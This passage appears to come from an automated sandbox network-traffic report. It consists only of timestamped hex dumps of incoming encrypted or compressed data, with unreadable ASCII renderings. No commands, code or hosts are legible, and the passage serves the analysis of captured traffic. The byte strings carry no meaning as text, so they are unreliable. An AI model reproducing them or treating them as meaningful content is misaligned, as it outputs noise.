                                                                                                                                                            2022-09-29 12:45:12 UTC16442INData Raw: 70 21 09 de ba 30 42 99 39 47 07 0c 53 0e 6d 9f 57 13 b2 d2 17 70 06 04 f9 37 32 42 1b 1e 12 04 7d 0b 6c 3b 34 31 68 05 46 7b 50 22 4d f4 14 90 ae dc df 93 6d 14 6f 34 d0 8f 11 24 04 11 c7 94 0f 3c 0a 5e f0 0f 3d e4 ac ca 66 ba 90 38 f9 c3 7e 10 bf 12 bc 01 21 29 68 68 aa 3e ce 1b 76 9e ed 6b 2d 90 bf d1 3c 59 09 bf 34 8d cb e1 e6 e6 e8 20 d6 f6 be 9f 7e 80 22 0e 53 ff b9 df 3c 33 b7 5b dc 45 85 60 03 52 21 24 14 4d 2c 26 38 cb 42 a9 75 2d 83 74 8b fa b0 84 15 fc 83 4f 09 fc 88 33 79 b6 d0 35 ab e6 d2 b1 a3 ff 9a 0d a7 2b 54 bd a7 f5 09 01 b3 36 9d 34 1d 74 a9 05 68 f8 2c 90 56 f1 2a 9a 42 b4 04 0f 40 f9 27 6d b2 cb 4a 25 31 0c 9c 38 8b 06 a2 4c e1 3c bb a8 7a 59 80 ff 53 04 d5 99 3c 0c 75 42 2d e1 9c b1 32 9d ca 39 e2 39 65 25 4b aa ef 3b 49 78 2c f2 b2
                                                                                                                                                            Data Ascii: p!0B9GSmWp72B}l;41hF{P"Mmo4$<^=f8~!)hh>vk-<Y4 ~"S<3[E`R!$M,&8Bu-tO3y5+T64th,V*B@'mJ%18L<zYS<uB-299e%K;Ix,
                                                                                                                                                            2022-09-29 12:45:12 UTC16458INData Raw: 1e cc f4 f8 e6 b1 70 0b 7a 16 21 22 a3 7d 0a 06 45 b2 6b 77 0f 8f c0 94 ac c7 cc 28 49 c7 21 0d 8e fb aa 56 2d 28 af 0a 52 b7 99 69 43 9b 01 a0 47 90 b9 c2 41 02 1d f7 13 21 9a 6c d8 ba 47 d8 da 94 b9 7c e2 eb 68 cb 58 67 76 64 81 25 bd 93 b9 fb a7 3e 19 0e d8 bc 4e 8e 74 e8 7e 9d e6 67 ba df 7b 80 02 cc b9 6b 59 08 06 e6 63 29 a3 2d b3 c6 52 e7 72 26 12 1d ab 57 f7 13 82 ef 0b 07 17 94 6a 91 73 60 c5 bc b5 94 02 6c c4 12 1e 77 1f cf ba cf 4d d3 ab c3 4f d7 4b 54 44 59 96 42 d2 4c 35 7a ba e2 ef 87 c6 99 cf 4f 10 de c4 bb 64 12 17 23 43 9d 2c 46 02 20 e2 cf d0 95 b6 ee 33 ef 66 0b 0e 61 b6 3b 2b 14 bd c8 a9 a9 b7 0e 28 21 03 ac f5 fd 04 fb 6d 0a 50 ed 5a 03 50 68 40 4f 74 75 85 4b 94 38 db 6d 5d dd fc 53 8a ab df 7f 09 46 18 38 21 ca 73 c8 3c e6 d1 c1 bf
                                                                                                                                                            Data Ascii: pz!"}Ekw(I!V-(RiCGA!lG|hXgvd%>Nt~g{kYc)-Rr&Wjs`lwMOKTDYBL5zOd#C,F 3fa;+(!mPZPh@OtuK8m]SF8!s<
                                                                                                                                                            2022-09-29 12:45:12 UTC16474INData Raw: 6d e5 ce c5 f5 94 4e 02 b3 2f e8 18 12 7f 2d b2 a6 d0 d8 c1 dc 0a 57 b2 22 1e 35 c1 a6 b0 38 02 67 6a 7b 84 34 32 6c c0 19 51 7a 00 25 1f b1 08 94 1c d3 f8 e6 17 ff 32 bd 2e b2 d2 1f 32 b9 51 bf 38 3e 17 fb 64 b8 97 b7 4c d2 e5 07 f6 92 1a 3a 6c bd 4c 5a e2 44 df a6 16 12 21 2f 8a c2 50 22 f2 6d 4a 29 b9 ae f4 61 f0 91 3e 61 3a f3 b6 ba a9 94 72 cf b1 65 e8 44 05 a3 79 7d 02 17 18 68 0a fb 0d 35 e8 f4 ca f7 5b 60 c3 31 6c ad b2 a6 18 5a 68 28 f3 a5 85 e3 0c 80 07 64 5c 28 b4 66 4d e5 1d 42 02 f0 9e 37 a5 b1 9f 83 97 95 a1 f1 16 e2 b5 52 70 2c 98 d0 ec 57 ec f8 02 5c c9 f6 0a e3 80 95 96 c4 50 87 41 dd aa a3 97 7b 3b 0b 46 0f 97 71 77 4b ff a6 31 e5 f3 e1 98 36 b0 25 10 a4 b2 39 a5 44 2d 86 fc 96 f2 8b e3 c6 62 dc 15 7a fc 43 51 67 c6 21 62 3b 35 78 7c a0
                                                                                                                                                            Data Ascii: mN/-W"58gj{42lQz%2.2Q8>dL:lLZD!/P"mJ)a>a:reDy}h5[`1lZh(d\(fMB7Rp,W\PA{;FqwK16%9D-bzCQg!b;5x|
                                                                                                                                                            2022-09-29 12:45:12 UTC16490INData Raw: f9 fd 4d 93 f4 67 37 bb 7d 5e 4e 56 77 36 88 7e 8b 8c 51 6d 13 d1 13 d8 aa 03 a6 e4 40 2b e2 cc 48 d0 6d 36 d6 12 4e 87 43 e1 d3 ff 47 92 c8 c6 eb e1 33 b1 12 65 32 71 f0 74 0d 70 7f cd ef 9a 41 24 d4 ef 3a 10 88 36 fb c5 c0 41 83 be 47 1c 97 1e 79 4f 17 d5 da ff 05 b6 8f 8d b9 d7 34 57 9f d3 c6 79 db cd 7f 47 eb 44 1d 66 b8 5d 66 81 7a 8d cd 66 46 02 0b 0f c0 1e 24 ac e1 12 99 8e a2 99 c4 13 f5 6b 13 06 78 7e 5e d8 f9 b4 13 20 24 ee 03 8a a0 fe b2 38 18 cc 77 21 dc e3 88 cd e1 2c 01 94 76 fe 11 cd be 48 49 d0 37 51 6b c1 1a d0 43 b7 3d 2a a0 37 79 ec 07 a7 6d b1 69 35 23 89 b5 5f fd b0 1c 52 3e c3 c1 39 33 a4 20 7b e5 b0 7d 04 09 6d 0b 31 8e 42 9a 87 f5 e2 97 f3 2e 85 19 d7 d7 54 5e 11 85 a4 01 7a c8 8d 22 8a 32 cb 54 47 2a 82 c1 e3 75 fc a0 be ba 4e 0d
                                                                                                                                                            Data Ascii: Mg7}^NVw6~Qm@+Hm6NCG3e2qtpA$:6AGyO4WyGDf]fzfF$kx~^ $8w!,vHI7QkC=*7ymi5#_R>93 {}m1B.T^z"2TG*uN
                                                                                                                                                            2022-09-29 12:45:12 UTC16506INData Raw: a5 b6 62 cf 4f bd 86 98 d2 9f 9a 67 6a 0f 3c bd 88 e5 44 97 f6 25 14 35 9e 07 f8 3e c7 35 15 1b 2b f6 50 44 e8 99 2b 0b a8 71 d7 7e 50 67 2f 9f e7 2b 47 aa 81 72 0f cd 12 64 20 82 70 81 57 d8 2d 0c f3 7d 90 70 5a 14 f3 0b c7 f6 d5 5d 5d 2a 8d 25 e6 c3 fc 89 71 16 c5 46 dc 65 d4 77 3e f1 64 fc b9 f5 c1 87 d4 2a ac 65 03 1b ed ad f5 83 ca f9 49 74 c9 23 33 9c f1 c0 7a 1a 15 e5 ce 95 37 42 30 10 c1 b2 9e cb 8a d1 f4 bc ef 79 66 83 a1 cf e9 91 1b 46 5b 43 85 03 1b 67 99 86 64 69 d7 aa d8 55 b0 18 f1 aa df 65 19 01 09 0f 5e 60 15 88 5c b4 d2 76 63 80 b2 1a 58 99 39 22 0e 82 b4 43 cf 43 ce 2b f6 6c 29 bb dc 5a 99 a4 fa 42 42 7d 25 27 62 27 98 89 2d 8c 11 b9 6d 8d 0c 0d d7 b4 22 4d 89 25 ad c8 e1 57 6a ae bb 79 d7 ea c6 30 d7 db d3 f1 a5 48 23 48 cc 36 ef f3 6e
                                                                                                                                                            Data Ascii: bOgj<D%5>5+PD+q~Pg/+Grd pW-}pZ]]*%qFew>d*eIt#3z7B0yfF[CgdiUe^`\vcX9"CC+l)ZBB}%'b'-m"M%Wjy0H#H6n
                                                                                                                                                            2022-09-29 12:45:12 UTC16522INData Raw: 11 12 b5 19 18 97 a0 34 a1 e5 c8 0c ed f5 00 b9 78 9f 5b 28 85 e8 d0 80 91 c5 58 2b f4 18 6e c6 0f 8e 3b 9e 23 11 f0 dd d8 4b 6c c9 38 9e 3e 6d 91 66 10 8d ff 74 e0 69 21 11 a4 42 dc f4 13 f8 c2 ae 8a 4e ca 5e ec 66 a8 a7 8d fc 2d 13 80 21 f9 4f 6e f2 d1 71 62 fa da 28 70 54 0a c7 7d 34 b4 31 d8 d5 3e 72 4b 04 35 27 e4 55 94 41 63 24 44 68 48 b4 fd bf 59 30 37 fe 14 43 d2 c9 93 da 53 49 c3 81 3d da 17 34 85 8f 61 dc d2 62 36 9a d6 69 99 89 6b 26 ef e3 35 a4 ae 88 a9 d7 b5 ba a2 bc 40 2b 00 ac cd f1 28 01 15 31 af 71 3b 6a 3b 6e ec 67 25 92 2e 52 e9 46 af 78 bd 99 68 bd 9e d0 b3 a0 e3 10 28 e0 1d d5 03 64 40 46 7e 2f 0b e3 da fb 08 b7 c0 e8 70 8d 75 62 a7 3c 96 a3 5f 19 b5 da 06 7e 58 f6 c9 81 13 3f f3 db ff 20 9e bb 2a f7 9e 40 8f ca 0d 77 89 8f 53 71 c5
                                                                                                                                                            Data Ascii: 4x[(X+n;#Kl8>mfti!BN^f-!Onqb(pT}41>rK5'UAc$DhHY07CSI=4ab6ik&5@+(1q;j;ng%.RFxh(d@F~/pub<_~X? *@wSq
                                                                                                                                                            2022-09-29 12:45:12 UTC16526INData Raw: 7f ed 12 23 17 b8 f6 a0 d2 cd bd 7c 60 ff 37 04 28 a0 cf 7d a2 c7 a4 9a ee 3a a1 ed 23 86 51 58 f7 53 49 1a 87 cf 6d 08 49 c0 bf 37 df 2f ea 95 37 23 c0 58 44 46 b5 0b e8 b8 80 1d 63 7d 1c dc 72 5e 91 f4 65 33 89 da ce 9e d6 5e 7b b4 37 f2 b5 44 52 d1 b6 9f b1 89 08 01 40 f3 2b 2b 66 ab f5 6b 96 ca aa 9b 24 ce 31 31 90 0a 21 95 c0 64 66 17 27 dd bf 5e 5e f9 96 74 5a bb 37 69 6f ad f6 e9 ab e4 a7 6b 69 45 35 a2 b9 90 15 82 a1 6d 1b 47 70 f0 2c 4c 1a 92 91 10 3f 59 8d 0a c4 43 01 db 09 78 f6 74 3e 4f 83 88 ab f1 96 dd e9 f6 29 40 70 ec 3a 32 a8 38 9d 80 98 ed 27 e5 df bd 0b f2 65 d0 35 3b 34 b7 ae 30 bb db 54 36 42 73 11 2d c3 ae 8d 90 64 e6 98 67 b6 dd 73 97 71 e8 ed 3b 08 62 64 84 65 ad fe 63 4f 33 cf 05 5c 54 73 a5 c2 8b d0 d5 95 9b 3a d9 bb d4 6f 19 21
                                                                                                                                                            Data Ascii: #|`7(}:#QXSImI7/7#XDFc}r^e3^{7DR@++fk$11!df'^^tZ7iokiE5mGp,L?YCxt>O)@p:28'e5;40T6Bs-dgsq;bdecO3\Ts:o!
                                                                                                                                                            2022-09-29 12:45:12 UTC16542INData Raw: 27 65 09 be 62 b3 87 fb cc 08 02 22 f6 90 32 36 30 4b c2 0d 04 9d 35 9a 9d 79 8d a4 95 f0 66 57 89 11 d3 73 70 88 b9 e9 6e 43 b9 d0 9e 08 75 3c 3b e9 18 1a 62 72 e3 35 d2 9a 63 93 c9 b4 4d 83 1b b5 e6 66 66 a5 11 5b bf 00 fc d1 5e 83 0c 93 2c 30 d2 a8 55 c0 bd c5 10 cf b3 44 3b 39 5a c0 74 2e 26 49 ed 49 18 4a 94 65 09 0e ed a7 89 80 c0 01 80 f0 2c ea da 8d d3 0c 0c 29 e5 e1 cd 82 04 0b 2c f4 6c ea 37 25 4d 47 20 38 02 f1 98 0f 71 af 41 8a b1 de 9a aa 10 2f c9 2b c4 e6 7d 6b 26 1e db ee e4 66 c3 c5 a7 51 b1 66 39 b7 8c 48 fe 35 eb 9f a2 3d 90 18 a0 ea 9f 0d 96 95 8c f9 b6 4d 55 aa 4d 35 c4 97 4f 07 c7 51 05 b6 df e5 a7 4f c3 a8 94 9b 6a b7 bf 39 fa e0 04 1d 4a 06 23 3a 17 a2 6c 79 c6 7b 00 c1 cb ba ab 6d bd 9f f3 f5 49 f4 1a 87 ef 36 2d 87 df 73 b5 25 6b
                                                                                                                                                            Data Ascii: 'eb"260K5yfWspnCu<;br5cMff[^,0UD;9Zt.&IIJe,),l7%MG 8qA/+}k&fQf9H5=MUM5OQOj9J#:ly{mI6-s%k
                                                                                                                                                            2022-09-29 12:45:12 UTC16558INData Raw: 63 22 be 57 2d 1c 7a 29 e5 2d d0 3d a6 64 94 74 1b a8 36 6f ae 21 d8 07 c4 61 88 5a 50 a5 03 b6 00 e5 72 bf b4 99 a7 d2 35 e1 82 c1 59 01 bd e5 62 71 10 7e 96 6f 93 35 6d d1 25 7a ad fa ed 8e 45 3b e2 d3 c4 2d 59 b5 0a 51 30 f2 5d ad d3 54 4d 37 99 f5 64 24 9f 34 87 11 57 1a 47 b4 12 e7 46 55 d2 2d 64 bd 10 a9 55 87 ab 3d 37 51 2e 9d dd 76 9c 28 4b b3 c7 39 73 b6 f7 e0 9a 1a 0c 67 b7 04 33 11 4d 65 14 53 50 f7 1f 4d 09 89 e1 22 52 b8 8e 42 68 8a 62 9a 69 a3 da c6 63 58 3f 4a 03 9f 49 8c 5c 9e d6 70 a1 f1 cb d4 63 ee 64 4b 32 11 86 db 8c 6b 42 fb 0f 16 0b ae 7c 3b fe 2e f9 c5 00 98 5c 23 15 c0 2a 7c 45 27 05 db b2 b7 16 db b5 0e 64 f2 19 87 cf 32 fd 31 a2 4e 9d aa 75 06 de dc d6 f7 b3 ec 48 1c 47 76 12 a6 65 51 4a 86 07 3b eb a5 7e cd 20 48 6b e0 b3 a4 31
                                                                                                                                                            Data Ascii: c"W-z)-=dt6o!aZPr5Ybq~o5m%zE;-YQ0]TM7d$4WGFU-dU=7Q.v(K9sg3MeSPM"RBhbicX?JI\pcdK2kB|;.\#*|E'd21NuHGveQJ;~ Hk1
                                                                                                                                                            2022-09-29 12:45:12 UTC16574INData Raw: 57 03 ae 45 a2 dc e3 bc e0 b0 cd 9a df 20 06 02 53 0b 28 ca 72 23 ed 56 fb 9a da dd 9a 1f 83 6b 0e 0a 95 fe 79 d0 a2 86 d5 19 ac 56 07 b7 d9 ae 83 2e 2c a4 90 c5 d1 c8 83 0f e8 c2 e0 0a f3 8b ae 8a 2c 43 33 58 a8 e6 be 1e 5c fc 8d 35 8c 0f 65 1f ca 14 2d 67 5b 09 48 8b 7c f0 de 8c b4 b1 e3 1e a3 9a fc c6 32 a8 57 98 98 15 f4 ba 7f da 66 64 04 f2 1b c6 ee a3 c5 d1 42 85 7c 07 a9 8c a8 75 ca e9 05 76 4b 85 48 ec 1b 64 51 20 a1 0e 8b e8 f7 91 5b 93 c4 82 e4 44 b1 69 98 78 6e ee 39 78 a5 85 8d 4e 64 72 6f 4e b0 c3 7f db 50 eb 4e c1 a6 5c 1b 62 52 32 c0 b9 53 23 ca 13 73 64 49 df e9 22 e7 52 a3 f9 22 fa ab b5 4d 8c 17 e3 0e 4e 2f c7 3c 7a 8f c7 48 e7 ce 2d 69 ca d8 19 f6 90 7a 15 2d 04 43 95 8f d9 6c a4 09 4a e5 97 01 1b 96 ae 65 c1 cb 81 10 32 c5 d8 77 80 38
                                                                                                                                                            Data Ascii: WE S(r#VkyV.,,C3X\5e-g[H|2WfdB|uvKHdQ [Dixn9xNdroNPN\bR2S#sdI"R"MN/<zH-iz-ClJe2w8
                                                                                                                                                            2022-09-29 12:45:12 UTC16590INData Raw: b1 16 c3 b3 37 09 72 07 ad 06 7d a2 9c be 28 5d 66 22 45 c4 48 54 df ca 6f 4e 44 58 b9 ec 46 99 01 4c ee 34 31 75 6a 97 d9 7d 74 05 bf a0 2a 2c 49 01 bb b8 9a 1b 0b 52 ce b2 38 7f 46 0f 5e 46 a4 6d 58 5f 71 08 b0 8f b9 6f 11 9e e0 41 af ee 54 80 8b 6d c8 7c 82 04 0d d7 a4 1b 8f c8 d5 a4 f1 eb cf 0f ca a4 c5 bf 11 00 d9 d8 d5 5e a1 30 b0 41 47 4b 5c 5d b7 2c c4 59 b4 7c 07 28 db ca c7 ca c1 f2 bd ba 9d 54 ee 3c 65 3c b3 16 a4 d9 d7 8a 1f 2f a5 35 bb 29 87 d3 9e 30 9b c0 3c 43 be 65 b1 6d 05 da 43 f4 b8 1e c4 9f 34 a1 93 36 30 7c 8a 46 74 cd 81 84 95 07 3a 11 b6 ba 77 26 5a e5 7b 2c a1 c2 91 d2 c7 05 e3 5b ec 38 39 c7 1c b8 c6 97 b5 4e 6b a5 e8 bc b1 53 ec 3e 8e 1f 4f d1 d9 8b 23 e7 6a 33 92 f4 4d 0b e4 b1 27 08 b9 48 ff ad 01 4a d0 75 6f 34 b8 76 c7 48 ec
                                                                                                                                                            Data Ascii: 7r}(]f"EHToNDXFL41uj}t*,IR8F^FmX_qoATm|^0AGK\],Y|(T<e</5)0<CemC460|Ft:w&Z{,[89NkS>O#j3M'HJuo4vH
                                                                                                                                                            2022-09-29 12:45:12 UTC16606INData Raw: 52 ca 97 fd f1 19 a3 e2 34 5b 4d 07 f4 b6 f3 c4 1f cb aa de 13 28 b4 76 6c a5 1d 0d 85 8b 01 94 64 b1 c2 73 57 28 95 9b 30 2c f8 13 42 13 74 f0 79 d7 bf 28 4c b9 e0 a8 ac 1d f8 db be d3 ff 75 ca 26 64 27 1b 95 66 18 a0 c7 52 b1 bc 4e a7 f5 38 16 16 5a 27 86 66 57 20 cd f8 86 6b fd 28 7a 9a 8b e9 8f fd d1 12 5d 0b f5 67 34 68 5b e3 32 f3 75 4d 23 39 4d 45 74 13 34 7d 8d 17 ed fc b7 d7 ab ea 85 12 32 05 62 d2 69 85 f8 e2 c6 c4 67 08 0b 41 a8 0d 93 6d c1 b6 f9 f5 03 ae 5a 9f 66 c7 64 ba 0c 29 53 45 9f 7c 1b 65 f0 c0 e1 55 52 cc da a5 9f 6d d9 5d 1c 0d 4e 8c 95 57 d7 46 0b 27 0b b3 95 22 1e 55 01 a5 56 90 4f 1b 55 95 8f 7b 2d a6 58 f5 2c 69 e5 e7 b1 20 b0 2a 2a cd c1 e1 e3 1e c2 46 6c 2c 44 bd 3d 18 44 f6 e3 e6 12 5b 2d 70 ae ad fa 31 d5 d0 a2 07 e1 a7 8b 2d
                                                                                                                                                            Data Ascii: R4[M(vldsW(0,Bty(Lu&d'fRN8Z'fW k(z]g4h[2uM#9MEt4}2bigAmZfd)SE|eURm]NWF'"UVOU{-X,i **Fl,D=D[-p1-
                                                                                                                                                            2022-09-29 12:45:12 UTC16622INData Raw: c9 71 a5 cd e4 9b 8a a2 49 40 77 10 a7 8d 4c 25 c6 9d c3 07 86 85 68 33 24 d5 93 d3 12 9d 25 71 32 76 ea 55 87 b1 6a c4 f3 ee 94 03 2d e8 e4 8d df c2 65 30 07 9d 0d c2 01 cc 00 67 bd b9 02 23 7f cf 97 69 6c 48 34 67 a4 23 8f 67 ec 80 55 4a c0 96 43 51 ff 70 aa 95 41 8a 13 e3 89 4c df 73 d6 c7 6a ab dc 18 40 0d e8 c6 29 92 7c 7f 45 3c c2 9a 8f 30 e2 f8 c1 29 d8 39 95 67 68 bb 0a 23 12 81 a3 47 75 6c 80 60 73 51 f4 9a 0f cb 99 80 95 a2 5a 49 1b 19 64 40 09 0f a3 b2 6e 18 e7 0d 78 37 27 08 e5 d2 55 ea bb 36 66 77 65 a5 0a 24 0c e0 07 e3 c0 6a e0 34 41 b2 ac e1 1d 9f ec 37 55 d0 85 e6 af 15 f8 9a 76 68 16 27 02 89 ba dd bd 5b 9f e6 b9 73 7a cc c6 83 fc b0 4c 2d f9 9d b8 9e 17 e6 48 c8 2e 54 cc 18 c9 f5 c9 89 79 54 c4 92 da 5f 3c e4 98 2b dc fe 66 6a db 87 9e
                                                                                                                                                            Data Ascii: qI@wL%h3$%q2vUj-e0g#ilH4g#gUJCQpALsj@)|E<0)9gh#Gul`sQZId@nx7'U6fwe$j4A7Uvh'[szL-H.TyT_<+fj
                                                                                                                                                            2022-09-29 12:45:12 UTC16638INData Raw: b8 a7 94 02 ca 00 e3 89 d0 80 90 d0 d9 d1 30 dc 76 19 06 e4 fc 7f 82 a9 61 09 54 5d e5 c5 c8 63 e2 d5 9b b2 3e a8 a2 5a 24 34 2d 9f c7 be 19 3d aa c6 e5 25 83 f3 1c d8 38 54 07 e0 d0 d1 a6 7b ac b6 ce a8 d7 e3 f2 c3 3c 1d 9b 28 a1 92 1a 55 99 45 2c c2 21 04 15 e2 0d 4a b2 20 5c ca e0 ab 51 20 67 97 27 77 d6 e2 10 4e 77 a5 62 6f 11 87 5f ad 81 5e d9 53 be 71 b9 99 84 f9 39 9a 4a e1 ad 50 a1 d8 bf 70 b5 c2 f3 83 d5 c1 9d 9c 74 f0 53 4c 06 cb 14 78 09 9c 63 85 23 fb 23 f1 8a d3 0d aa ca 60 2d 09 7d 49 1e f1 14 75 23 56 06 45 20 d9 0d 1f 60 6b 45 78 ce e6 84 5f ac a2 cc d0 0f cf 6f 3c 05 71 1b 14 4b dd 8f 45 92 2e 7a b2 a2 33 07 9b 7c 6a da 7e 10 f5 e1 0f 3b 2e 25 ac e5 0a 25 d5 6e 39 35 8b 85 0b 75 dc 60 d7 d9 bc da 18 c1 3b da c1 53 7c ae 21 76 85 e8 c2 08
                                                                                                                                                            Data Ascii: 0vaT]c>Z$4-=%8T{<(UE,!J \Q g'wNwbo_^Sq9JPptSLxc##`-}Iu#VE `kEx_o<qKE.z3|j~;.%%n95u`;S|!v
                                                                                                                                                            2022-09-29 12:45:12 UTC16654INData Raw: be ac 07 ad d6 7c e3 c8 30 a4 6a 5e 55 e5 fe 4d ad 93 e3 38 2b 68 f2 ac c0 c5 c6 42 b6 69 6f e6 33 77 33 7a 7a 32 65 01 27 3f 1c cc ec d9 96 3f 2e fe 83 61 a5 45 a0 09 fb 4d 6f 65 9d 2a 3a a9 be ca 99 03 0d 28 ed db 58 8e 36 92 93 8d 9e ee 4a 58 b1 fd 84 5d 76 0f ba b4 d3 4f d7 ab f6 8d d2 9c 7e 8f 8a 49 0a ae 2c 06 be 86 58 f0 42 39 97 47 97 91 90 df 24 13 88 4b 83 27 5f 64 b9 48 df e8 db b4 ec fa fe a7 1a cb 48 af 8b 8c 54 88 5f f7 72 fd ab dc 6a 18 54 d7 4d 4b 59 dc 86 0b ef e8 84 1f e4 d4 7b 4e 04 d6 b3 a2 77 5d a0 59 c8 13 7b 5d 62 c1 57 31 8f d9 0e ed 17 3d 1f 9d 66 ce 47 db 62 39 33 97 7c 98 69 f5 02 ec 23 74 d8 6d 59 f6 c2 d1 8d f8 87 be f0 e8 22 4b b9 48 3f 40 38 12 f8 22 d0 09 65 68 43 a6 e1 1a 3e b0 9f 64 49 76 13 36 0e a1 83 24 3e 42 60 9e 46
                                                                                                                                                            Data Ascii: |0j^UM8+hBio3w3zz2e'??.aEMoe*:(X6JX]vO~I,XB9G$K'_dHHT_rjTMKY{Nw]Y{]bW1=fGb93|i#tmY"KH?@8"ehC>dIv6$>B`F
                                                                                                                                                            2022-09-29 12:45:12 UTC16670INData Raw: 0b 87 86 19 eb d0 b3 0a fc 42 fa e6 69 c6 f5 66 70 8d 51 ad 80 55 2e c2 26 54 4e 65 c8 ff cb 30 16 10 c6 84 02 5f 97 06 11 eb ab af 64 9d ac ac 9c 51 e3 11 36 11 74 6f 7d d8 b2 1e 3d 59 84 94 7e b4 60 f6 90 30 e8 58 76 bf da 42 99 ee 2b 52 d9 38 ed ab ee 26 e9 19 3c 6c 29 bf 0e 0b ab b0 6f fb 1c b5 32 1d cd c0 fa c0 76 7b 1c d5 15 98 1d a9 ec e1 4c 9e fa 90 60 54 f4 83 2d 6a 22 2f 7f cc 51 31 6f 44 af 96 d9 8b 95 a2 df ea 47 9c a8 60 05 75 0d 28 4a e9 09 17 fb a1 39 09 a5 80 4a 17 35 06 42 21 93 39 a4 b6 21 ea db 49 8c 10 60 2a 80 2f 5c 26 2b b0 42 c1 a2 d8 08 df 89 72 ad 64 62 60 f9 7b ec 7b 5d 9f e2 2f 6f ad 89 b7 bd 2f 11 53 82 69 01 82 6a 68 fd c5 18 0f 1f c7 1f a0 04 e9 68 8a 9b 6b 46 ff 3f d9 0a fd 89 e7 bb d9 6f 8c bf f8 df a7 1a e3 04 d4 2e 02 4e
                                                                                                                                                            Data Ascii: BifpQU.&TNe0_dQ6to}=Y~`0XvB+R8&<l)o2v{L`T-j"/Q1oDG`u(J9J5B!9!I`*/\&+Brdb`{{]/o/SijhhkF?o.N
                                                                                                                                                            2022-09-29 12:45:12 UTC16686INData Raw: d8 d4 46 96 1d 82 33 b1 58 37 d1 e6 4e dc f0 58 b2 09 f8 22 e8 98 f8 09 38 36 8c 9d cc 6d 20 b0 ed 32 dd 6c e9 8e b7 df 23 da 20 7e 1a 72 dc 0c f9 22 64 f0 ae ce cf 08 b9 e1 65 8f bc e5 e9 8f 07 c5 18 5c 43 7c 33 7b 3b 55 51 09 91 bf ac 98 b5 ab 1c 51 53 bd 51 d9 ab b6 28 0f ec bd 47 8c 69 75 de d3 06 cf 03 41 4f b6 b8 5a d4 bd 6c f6 08 3f d6 0a db 7c da b0 96 72 43 81 0c 72 c0 35 65 a2 0e bb 48 b3 38 12 3f 49 88 f3 d0 4f 43 82 0c 75 35 7b 45 aa 9f ed 05 c0 bf a2 47 ba 22 48 e7 77 6e 45 4b 64 f9 9d ac 95 da aa b5 4e 05 72 3d cb 2b 24 d1 01 80 9f 8e 18 07 94 cc 82 47 b6 2b 8e f0 ec 5f 29 80 70 ff 71 50 23 03 62 a7 ae 9b 8b 85 f2 b6 0f 32 5f 5f ac 1e ef bb 30 d8 9d 3f cb 64 b0 d3 49 77 c2 8b 94 1e 41 d3 cd f3 95 b4 e5 5d 12 5b da fb 86 2b c5 c8 92 bc 20 47
                                                                                                                                                            Data Ascii: F3X7NX"86m 2l# ~r"de\C|3{;UQQSQ(GiuAOZl?|rCr5eH8?IOCu5{EG"HwnEKdNr=+$G+_)pqP#b2__0?dIwA][+ G
                                                                                                                                                            2022-09-29 12:45:13 UTC16702INData Raw: 5c c7 b7 3e 6f ff 75 d2 8f 59 7f e1 fb 97 31 ab 88 ff e9 f5 95 56 78 84 05 a8 ff f5 29 be 22 25 54 98 7c 60 de ba 1c 47 6d 0e 4f d0 ff 20 02 ad ea 9a d6 94 0d a8 33 97 2e 69 98 17 49 af cc 45 d9 38 26 55 ce 84 9d 4f 38 cf 70 79 ce aa 05 9f cb 1b bf 91 9c c1 da 13 2a 6a bb 2f ce 12 a9 1c fc 6b 89 32 da 3e bd 92 53 29 1e 8e 3f 70 53 a6 cd 66 e5 6c 32 2c b1 93 bd 7f 3e 9a 24 0b 62 88 b5 5e 11 89 40 07 92 12 63 87 67 4f 23 03 30 45 12 4e 3a fd 39 c8 d9 16 c1 19 6c c8 b3 a7 a0 e6 44 0e 7e 7c 92 dd bf 35 3f a3 4d 52 44 cc e9 04 33 0d e7 55 ea 27 75 96 56 ee 07 88 c3 c1 68 71 08 d9 06 d8 29 5f 7b 9e 58 6b 09 97 9a 88 21 df 1c b5 78 d7 dc af 84 f7 39 fc f6 59 1a 92 29 4f f0 0a fe da e4 f1 8d 11 d6 92 7d 3f dd c0 47 e6 62 3f 6e a9 1e 2c c8 67 25 59 03 fe a2 c7 f5
                                                                                                                                                            Data Ascii: \>ouY1Vx)"%T|`GmO 3.iIE8&UO8py*j/k2>S)?pSfl2,>$b^@cgO#0EN:9lD~|5?MRD3U'uVhq)_{Xk!x9Y)O}?Gb?n,g%Y
                                                                                                                                                            2022-09-29 12:45:13 UTC16718INData Raw: ad 99 39 0f d4 ab 24 84 a2 5f 93 f8 83 b5 0d cd ff 93 9d 60 42 fd 36 27 b4 66 69 75 2a e1 d3 5a 0b 69 00 f6 cd 35 17 ab 73 fc e6 c6 b1 a8 d5 20 07 34 c3 4f bf dc 46 e8 6d 7b a0 94 27 b3 93 0f 91 66 1e cb 70 e3 21 3f de ef cb a7 f3 e0 e3 e8 f1 fd b2 a9 62 59 b7 2a 44 87 6d 17 11 54 55 5d ac f4 e4 36 bf dd 31 51 6a 99 4f 0c 98 c6 5c cb a2 27 3c 09 f8 e5 c9 dc bb 1b 20 a1 c4 24 9d 63 a7 26 db f0 7e c9 c3 9a bf 02 6f ef 44 03 4c 9a 93 67 28 b0 27 bd 9a fa e9 df 77 55 b9 32 69 27 43 a4 6e 5d c7 92 61 48 13 f5 37 04 d1 89 38 b1 af 8d 16 10 79 d1 87 80 f0 0a 58 d7 1e 7a 64 bb d5 51 d9 50 bb 3a 53 ef dd a2 ce 2d 12 b6 b7 b1 08 96 13 ac 7f 0c 46 93 2a 95 13 05 e3 b9 92 3b 10 a1 96 de 68 c7 29 99 a6 f8 d0 3b f4 aa 05 88 21 d3 94 d3 17 e1 10 9b b5 4e 68 ba c2 e8 b8
                                                                                                                                                            Data Ascii: 9$_`B6'fiu*Zi5s 4OFm{'fp!?bY*DmTU]61QjO\'< $c&~oDLg('wU2i'Cn]aH78yXzdQP:S-F*;h);!Nh
